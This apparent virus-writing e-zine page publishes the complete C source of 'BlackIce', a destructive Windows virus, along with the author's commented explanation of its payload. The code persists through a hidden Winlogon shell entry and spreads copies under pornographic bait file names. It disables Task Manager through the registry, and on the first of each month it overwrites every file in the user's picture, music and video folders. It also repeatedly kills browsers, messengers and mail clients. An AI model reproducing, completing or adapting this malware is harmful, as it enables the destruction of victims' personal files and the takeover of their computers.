<html><head><title>EOF ISSUE #0x01</title>
<style fprolloverstyle>A:hover {color: #D1F2C4; text-decoration: none}</style></head>
<body text="#E0E0E0" bgcolor="#131313" link="#BFBFBF" vlink="#BFBFBF" alink="#BFBFBF" style="font-size: 10pt">

<pre><hr>|| Author: SkyOut/EOF || <a style="text-decoration: none" href="../mainmenu/sources.htm"><span style="text-decoration: none">Back to sources</span></a> || <a style="text-decoration: none" target="_blank" href="../binsrc/SkyOut/BlackIce"><span style="text-decoration: none; color: #BFBF88">View project folder</span></a> || <hr></pre>
<pre>
/*
Payload of BlackIce:

- (Simple) stealth method to start automatically
- Copy to %windir%\system32
- Copy to personal folder several times and using random made names
- Disable the Windows Taskmanager over a bug found by Izee
- Before user is able to login pop up a message window
- Blank the desktop wallpaper
- On every 1st overwrite files in personal folder (my pictures/music/video)
- Stay in background and kill several processes to stop user from surfing and other things

#########################################################################
#########################################################################

	Author: SkyOut

	Compiled with: -&gt; Visual C++ 2005 Express Edition
				   -&gt; Microsoft PSDK for Windows Server 2003 R2

	Finished: 25th July 2006 - 20:15 - GMT +01:00

*/

/* Defining Windows Version being WindowsXP (0x0501) */
#define WIN32_WINNT 0x0501

/* The headers we need for our virus */
#include &lt;windows.h&gt;
#include &lt;shlobj.h&gt;
#include &lt;stdio.h&gt;
#include &lt;sys/stat.h&gt;
#include &lt;tlhelp32.h&gt;

/* Copy to %windir%\system32\BlackIce.exe 
and start over changing the system.ini file, this will be
saved in the registry on newer Windows systems:
-&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
-&gt;&quot;Shell&quot; = &quot;Explorer.exe X:\WINDOWS\system32\BlackIce.exe&quot;
(Tools like msconfig.exe are not able to see this)

Two other ways to start over win.ini are commented out, these
values are also savend in the registry on newer Windows systems.*/
void InfectPC(void)
{
	HMODULE Mod;
	char szSysDir[MAX_PATH];
	/*char szWinDir[MAX_PATH];*/
	char szVirusPath[MAX_PATH];
	char szFileToStart[] = &quot;Explorer.exe &quot;;

	GetSystemDirectory(szSysDir, sizeof(szSysDir));
	/*GetWindowsDirectory(szWinDir, sizeof(szWinDir));*/

	strcat_s(szSysDir, MAX_PATH, &quot;\\BlackIce.exe&quot;);
	/*strcat_s(szWinDir, MAX_PATH, &quot;\\BlackIce.exe&quot;);*/

	Mod = GetModuleHandle(NULL);
	GetModuleFileName(Mod, szVirusPath, sizeof(szVirusPath));

	CopyFile(szVirusPath, szSysDir, FALSE);
	/*CopyFile(szVirusPath, szWinDir, FALSE);*/	

	/*WriteProfileString(&quot;windows&quot;, &quot;run&quot;, szSysDir);
	WriteProfileString(&quot;windows&quot;, &quot;load&quot;, szWinDir);*/

	strcat_s(szFileToStart, MAX_PATH, szSysDir);
	WritePrivateProfileString(&quot;boot&quot;, &quot;Shell&quot;, szFileToStart, &quot;system.ini&quot;);
}

/* Copy the virus to the users personal folders ten times and choose
random names by using 5 different arrays */
void CopyToPC(void)
{	
	HMODULE Mod;
	char szPornName[MAX_PATH];
	char szPersonalFolder[MAX_PATH];
	char szVirusPath[MAX_PATH];
	int i;

	char *szName1[] = {&quot;horny&quot;, &quot;lewd&quot;, &quot;lustful&quot;, &quot;prurient&quot;, &quot;randy&quot;, &quot;ruttish&quot;,
								&quot;salacious&quot;, &quot;voluptuous&quot;, &quot;sexy&quot;, &quot;hot&quot;, &quot;addicted&quot;, &quot;dirty&quot;, &quot;evil&quot;};

	char *szName2[] = {&quot;Anna&quot;, &quot;Maria&quot;, &quot;Nicci&quot;, &quot;Julia&quot;, &quot;Mary&quot;, &quot;Patricia&quot;, &quot;Susan&quot;, &quot;Jennifer&quot;,
								&quot;Sandra&quot;, &quot;Sharon&quot;, &quot;Laura&quot;, &quot;Jessica&quot;, &quot;Christine&quot;, &quot;Ashley&quot;, &quot;Christina&quot;,
								&quot;Rachel&quot;, &quot;Marylin&quot;, &quot;Emily&quot;, &quot;Crystal&quot;, &quot;Victoria&quot;, &quot;Shannon&quot;, &quot;Eva&quot;};

	char *szName3[] = {&quot;fucked&quot;, &quot;screwed&quot;, &quot;shagged&quot;};

	char *szName4[] = {&quot;hard&quot;, &quot;soft&quot;, &quot;anal&quot;, &quot;oral&quot;, &quot;allnight&quot;, &quot;wholeday&quot;, &quot;alltime&quot;,&quot;regardless&quot;, 
								&quot;brutal&quot;, &quot;bestial&quot;, &quot;tough&quot;, &quot;violent&quot;};

	char *szName5[] = {&quot;mpg&quot;, &quot;mpeg&quot;, &quot;avi&quot;, &quot;wmv&quot;, &quot;jpg&quot;, &quot;bmp&quot;, &quot;jpeg&quot;, &quot;png&quot;, &quot;JPG&quot;, &quot;BMP&quot;, &quot;JPEG&quot;, &quot;PNG&quot;};

	Mod = GetModuleHandle(NULL);
	GetModuleFileName(Mod, szVirusPath, sizeof(szVirusPath));

	SHGetFolderPath(NULL, CSIDL_PERSONAL, NULL, SHGFP_TYPE_CURRENT, szPersonalFolder);

	SetCurrentDirectory(szPersonalFolder);
	
	/* Initialize the random number generator */
	srand(time(NULL));

	for (i = 0; i &lt; 10; i++)
	{
	sprintf_s(szPornName, MAX_PATH, &quot;%s_%s_%s_%s.%s.exe&quot;, szName1[(rand()%12)], szName2[(rand()%21)], szName3[(rand()%2)], szName4[(rand()%11)], szName5[(rand()%11)]);
	CopyFile(szVirusPath, szPornName, FALSE);
	}
}

/* A very nice thing discovered by Izee, it is a bug in the Taskmanager of
Windows (tested on WindowsXP SP 2) and this fumction changes the binary value of a registry
key, after this the Taskmanager will crash when opened, the normally opening window
asking for an error message to Microsoft is also blocked.*/
void TaskmngrDisableBug(void)
{
	HKEY hKey;
	DWORD dwData = 0;

	BYTE bBuff[] = {00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
	00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
	00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
	00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
	00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
	00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
	00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
	00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
	00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
	00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
	00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
	00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
	00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
	00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
	00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
	00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
	00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
	00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
	00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
	00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
	00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
	00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
	00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
	00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
	00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
	00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
	00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00};

	RegOpenKeyEx(HKEY_CURRENT_USER, &quot;Software\\Microsoft\\Windows NT\\CurrentVersion\\TaskManager&quot;, 0, KEY_SET_VALUE, &amp;hKey);
	RegSetValueEx(hKey, &quot;Preferences&quot;, 0, REG_BINARY, bBuff, sizeof(bBuff));
	RegCloseKey(hKey);

	RegOpenKeyEx(HKEY_LOCAL_MACHINE, &quot;SOFTWARE\\Microsoft\\PCHealth\\ErrorReporting&quot;, 0, KEY_SET_VALUE, &amp;hKey);
	RegSetValueEx(hKey, &quot;DoReport&quot;, 0, REG_DWORD, (LPBYTE)&amp;dwData, sizeof(DWORD));
	RegCloseKey(hKey);

}

/* Before user can access the login screen a window pops up showing some text specified by me =) */
void Messagebox(void)
{
	HKEY hKey;
	char szCaption[] = &quot;&lt;&gt;&lt; BlackIce &gt;&lt;&gt;&quot;;
	char szText[] = &quot;The computer has been infected with the BlackIce Virus by | Skyout |&gt;[Electrical Ordered Freedom]&quot;;

	RegOpenKeyEx(HKEY_LOCAL_MACHINE, &quot;Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon&quot;, 0, KEY_SET_VALUE, &amp;hKey);
	RegSetValueEx(hKey, &quot;LegalNoticeCaption&quot;, 0, REG_SZ, szCaption, sizeof(szCaption));
	RegCloseKey(hKey);

	RegOpenKeyEx(HKEY_LOCAL_MACHINE, &quot;Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon&quot;, 0, KEY_SET_VALUE, &amp;hKey);
	RegSetValueEx(hKey, &quot;LegalNoticeText&quot;, 0, REG_SZ, szText, sizeof(szText));
	RegCloseKey(hKey);
}

/* This will will blank the desktop wallpaper */
void BlankWallpaper(void)
{
	SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, &quot; &quot;, 0);
}

/* I think the function does not need to be explained ;) */
void HideTaskbar(void)
{
	ShowWindow(FindWindow(&quot;Shell_TrayWnd&quot;, NULL), SW_HIDE);
}

/* We check for a specific registry key to determine if the computer is infected with BlackIce */
BOOL IsPCInfected()
{
	HKEY hKey;
	char szBuf[MAX_PATH];
	DWORD dwBufLength = sizeof(szBuf);

	RegOpenKeyEx(HKEY_LOCAL_MACHINE, &quot;Software\\BlackIce&quot;, 0, KEY_QUERY_VALUE, &amp;hKey);
	RegQueryValueEx(hKey, &quot;BlackIce&quot;, 0, NULL, szBuf, &amp;dwBufLength);
	RegCloseKey(hKey);

	if (szBuf[0]!='B' || szBuf[1]!='l' || szBuf[3]!='a' || szBuf[4]!='c' || szBuf[5]!='k' || szBuf[6]!='I' || szBuf[7]!='c' || szBuf[8]!='e')
	{
		return -1;
	}
	else
	{
		return 0;
	}
}

/* A very little, but for many people important, process list of instant messenger programs, browsers and email clients */
char *ProcessList[] = {&quot;icq.exe&quot;, &quot;msnmsgr.exe&quot;, &quot;YahooMessenger.exe&quot;, &quot;gaim.exe&quot;, &quot;mirc.exe&quot;,
						&quot;firefox.exe&quot;, &quot;iexplore.exe&quot;, &quot;Opera.exe&quot;, &quot;thunderbird.exe&quot;, &quot;msimn.exe&quot;, 0};

/* A function doing a process enumeration, comparing it to our ProcessList array and killing those processes */
void KillProcess(char *ProcessList)
{
	HANDLE hProcSnap;
	HANDLE hProc;
	PROCESSENTRY32 pe32;

	pe32.dwSize = sizeof(PROCESSENTRY32);
	hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	Process32First(hProcSnap, &amp;pe32);

	do
	{
		hProc = OpenProcess(PROCESS_TERMINATE, FALSE, pe32.th32ProcessID);
		if(strcmp(pe32.szExeFile, ProcessList)==0)
		{
			TerminateProcess(hProc, 0);
			CloseHandle(hProc);
		}
		CloseHandle(hProc);

	}while (Process32Next(hProcSnap, &amp;pe32));
}

/* An overwriter function, it takes in a string to a folder location on the computer and
overwrites every file (not recursive) in this folder with a simple text, it does this by
-&gt;Deleting the file
-&gt;Creating a new one with the same name and copying the short data into it */
BOOL Overwrite(char *szOverwrite) 
{
	HANDLE hFind;
	HANDLE hFile;
    WIN32_FIND_DATA w32FD;
	DWORD dwNumberOfBytesWritten;
    char szFileName[MAX_PATH];
	char szFileName2[MAX_PATH];
	char szBuffer[] = &quot;[ELECTRICAL ORDERED FREEDOM]  [&lt;[BlackIce Virus]&gt;]  |&lt;&gt;|SkyOut|&lt;&gt;|\r\n&quot;;
 
    strcpy_s(szFileName, sizeof(szFileName), szOverwrite);
    strcat_s(szFileName, sizeof(szFileName), &quot;\\*&quot;);

    hFind = FindFirstFile(szFileName, &amp;w32FD);

	do
	{
		if (!((strcmp((char*) w32FD.cFileName, &quot;.&quot;) &amp;&amp; strcmp((char*) w32FD.cFileName, &quot;..&quot;))))
		{
			continue;
		}
		if(w32FD.dwFileAttributes &amp; FILE_ATTRIBUTE_READONLY)
		{
			_chmod(szFileName, _S_IWRITE);
		}
		strcpy_s(szFileName2, MAX_PATH, szOverwrite);
		((strcat_s(szFileName2, MAX_PATH, &quot;\\&quot;)) &amp; (strcat_s(szFileName2, MAX_PATH, w32FD.cFileName)));
		DeleteFile(szFileName2);

		hFile = CreateFile(szFileName2, GENERIC_WRITE|GENERIC_READ, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
		WriteFile(hFile, szBuffer, sizeof(szBuffer), &amp;dwNumberOfBytesWritten, NULL);
		CloseHandle(hFile);

	}while(FindNextFile(hFind, &amp;w32FD));
	FindClose(hFind);
	return 1;
}

/* ############################################################################################### */
/* --- --- MAIN CODE NOW --- --- MAIN CODE NOW --- --- MAIN CODE NOW --- --- MAIN CODE NOW --- --- */
/* ############################################################################################### */

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, int iCmdShow)
{
	BOOL bInfected;
	SYSTEMTIME stTime;
	char szDate[MAX_PATH];
	int i;

	/* Test if the computer is still infected */
	bInfected = IsPCInfected();
	
	/* If not write the registry value telling us this for the next time and call some of the above functions */
	if(bInfected == -1)
	{
		HKEY hKey;
		char szBlackIce[] = &quot;BlackIce&quot;;

		RegCreateKey(HKEY_LOCAL_MACHINE, &quot;Software\\BlackIce&quot;, &amp;hKey);
		RegSetValueEx(hKey, &quot;BlackIce&quot;, 0, REG_SZ, szBlackIce, sizeof(szBlackIce));
		RegCloseKey(hKey);

		InfectPC();
		CopyToPC();
		TaskmngrDisableBug();
		Messagebox();
		BlankWallpaper();
	}

	/* We check for the system date and get a value like &quot;1&quot;, &quot;12&quot;, &quot;23&quot;, ... showing us the day */
	GetSystemTime(&amp;stTime);
	GetDateFormat(LOCALE_USER_DEFAULT, 0, &amp;stTime, &quot;dd&quot;, szDate, sizeof(szDate));

	/* If it is the first of a month we begin to overwrite every file in:
	-&gt;MY PICTURES
	-&gt;MY MUSIC
	-&gt;MY VIDEO
	these folders are located in the personal folder a user. Then the virus hides the taskbar and
	displays a message telling the user some stuff */
	if(stTime.wDay == 1)
	{	
		char szPath[MAX_PATH];

		SHGetFolderPath(NULL, CSIDL_MYPICTURES, NULL, SHGFP_TYPE_CURRENT, szPath);
		Overwrite(szPath);

		SHGetFolderPath(NULL, CSIDL_MYMUSIC, NULL, SHGFP_TYPE_CURRENT, szPath);
		Overwrite(szPath);

		SHGetFolderPath(NULL, CSIDL_MYVIDEO, NULL, SHGFP_TYPE_CURRENT, szPath);
		Overwrite(szPath);

		HideTaskbar();

		MessageBox(NULL, &quot;\t|&lt;&gt;| BlackIce VIRUS by SkyOut [ELECTRICAL ORDERED FREEDOM] |&lt;&gt;|\n\n&quot;
					     &quot;#########################################################\n\n&quot;
						 &quot;My statement:\n&quot;
						 &quot;You might ask yourself why I write virii, do I want to destroy you?\n&quot;
						 &quot;Maybe I like to see people loosing things, which are important for them?\n&quot;
						 &quot;Hmm, nice ideas, but no!\n\n&quot;
						 &quot;I write viruses as a way of self expression and to do something creatively,\n&quot;
						 &quot;using something in a way it was not expected to be used is very interestind and is much fun.\n&quot;
						 &quot;When you are infected by this virus it only shows that you do not have a good knowlegde\n&quot;
						 &quot;about computers and risks, so start learning about this now!\n\n&quot;
						 &quot;SkyOut[EOF]&quot;,
						 &quot;Electrical Ordered Freedom&quot;, 0);
	}
	
	/* Let us begin running in the background and really fuck up the user =)
	With this code we will check running processes every five seconds and kill processes
	being in our ProcessList array */
	do
	{
		for (i = 0; ProcessList[i]; i++)
		{
			KillProcess(ProcessList[i]);
		}
		Sleep(5000);
	}while(1);
}
</pre></body></html>